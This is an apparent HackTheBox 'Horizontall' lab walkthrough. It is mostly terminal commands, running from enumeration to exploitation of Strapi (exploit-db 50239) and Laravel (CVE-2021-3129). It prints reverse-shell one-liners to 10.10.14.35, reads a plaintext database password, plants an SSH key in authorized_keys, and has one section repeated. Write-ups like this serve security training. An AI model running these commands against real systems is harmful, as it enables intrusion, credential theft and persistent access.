HackTheBox – Horizontall Walkthrough

┌──(rootkali)-[/home/kali/Downloads]

└─# nmap -A 10.10.11.105

http://horizontall.htb/

┌──(rootkali)-[/home/kali/Downloads]

└─# gobuster dir -u http://horizontall.htb/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -t 150

┌──(rootkali)-[/home/kali/Downloads]

└─# gobuster vhost -u http://horizontall.htb/ -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -t 150

┌──(rootkali)-[/home/kali/Downloads]

└─# gobuster dir -u http://api-prod.horizontall.htb/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -t 150

http://api-prod.horizontall.htb/reviews

http://api-prod.horizontall.htb/admin

After reading the source code, I got the clue.

strapi  login page, I tried basic SQL injections nothing back

further enum read blogs/cve about strapi, 

, then I found the version of strapi

view-source:http://api-prod.horizontall.htb/admin/strapiVersion

“strapiVersion”:”3.0.0-beta.17.4″

https://www.exploit-db.com/exploits/50239

┌──(rootkali)-[/home/kali/Downloads]

└─# python3 50239.py http://api-prod.horizontall.htb/

┌──(rootkali)-[/home/kali/Downloads]

└─# nc -lvnp 6969  

  $> bash -c ‘bash -i >& /dev/tcp/10.10.14.35/6969 0>&1’

strapi@horizontall:/$ cd /opt/

strapi@horizontall:/opt$ cd strapi

strapi@horizontall:~$ cd myapi

strapi@horizontall:~/myapi$ cd config

strapi@horizontall:~/myapi/config$ cd environments

strapi@horizontall:~/myapi/config/environments$ cd development

strapi@horizontall:~/myapi/config/environments/development$ cat database.json

“username”: “developer”,

“password”: “#J!:F9Zt2u”

strapi@horizontall:~/myapi/config/environments/development$ netstat -tulpn | grep LISTEN

When I was scrolling down, suddenly I noticed the open ports on the local machine. Port 3306 is for MySql connection, port 1337 is for API calls, but port 8000 was strange. I ran a curl command to see what was going on there.

strapi@horizontall:~/myapi/config/environments/development$ curl http://localhost:8000

strapi@horizontall:~/myapi/config/environments/development$ cd ~

strapi@horizontall:~$ cd .ssh

strapi@horizontall:~/.ssh$ ls –lrt

strapi@horizontall:~/.ssh$ cat authorized_keys

strapi@horizontall:~/.ssh$ echo “ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDYi25AmGCouopUL+dykKSA/DJUUZTNq8B0QJuwItrj5TrSKIF3Tkc8w3nSOaBz2JVqP22wvNX/Ca4IIY51gZEFIYm6k9HxezWJwOQq4x1VV/wH0sXLIm6P/MW8DuZM0XvgN+a8w7Cfgo5e659xdVtNvUSFazIM+Fb/SMYp9N8TwxQtPTshuXAup1H2HB7Knb3rJT0CKFKIg8s36Hy4m7GyCr0En7Fjl/n9JfoxUZvaA2LA5CurR/UD75nD021XX9xYobnPby0AveP0HF8ZFD2xxqKxzH5Zc25u2D6BYXHSTiofFiYDkHiLDIPeQgA/PdiTc4TrL5x8H7xxbYA8j106yFVxd7UhTow8fBzCvgCMJN5uCNj+Deo4LgFJjrYArwrMnK3Y69nF0emSOXBU8ZJXRQNUkebIEwpBPTNUwcYnUMeT3wNyGtjbK2GjhRipOyOHUgVqePZep1/njBx6YKQr7A30zPOnQHt05vuLGxwDKm0UiWFOBifKYtGqHBqES6c= root@kali” > authorized_keys

┌──(rootkali)-[/home/kali/Downloads]

└─# ssh -i key -L 8000:127.0.0.1:8000 strapi@horizontall.htb 

It was easy to notice that on port 8000 a Laravel v8 framework was working. I did a quick search about Laravel v8 framework.

https://github.com/nth347/CVE-2021-3129_exploit

┌──(rootkali)-[/home/kali/Downloads]

└─# git clone https://github.com/nth347/CVE-2021-3129_exploit.git

┌──(rootkali)-[/home/kali/Downloads]

└─# cd CVE-2021-3129_exploit

It was easy to notice that on port 8000 a Laravel v8 framework was working. I did a quick search about Laravel v8 framework.

https://github.com/nth347/CVE-2021-3129_exploit

┌──(rootkali)-[/home/kali/Downloads]

└─# git clone https://github.com/nth347/CVE-2021-3129_exploit.git

┌──(rootkali)-[/home/kali/Downloads]

└─# cd CVE-2021-3129_exploit

┌──(rootkali)-[/home/kali/Downloads/CVE-2021-3129_exploit]

└─# python3 exploit.py http://127.0.0.1:8000 Monolog/RCE1 “cat /root/root.txt”

┌──(rootkali)-[/home/kali/Downloads/CVE-2021-3129_exploit]

└─# python3 exploit.py http://127.0.0.1:8000 Monolog/RCE1 “nc 10.10.14.35 6666| /bin/bash 2>&1 | nc 10.10.14.35 6667”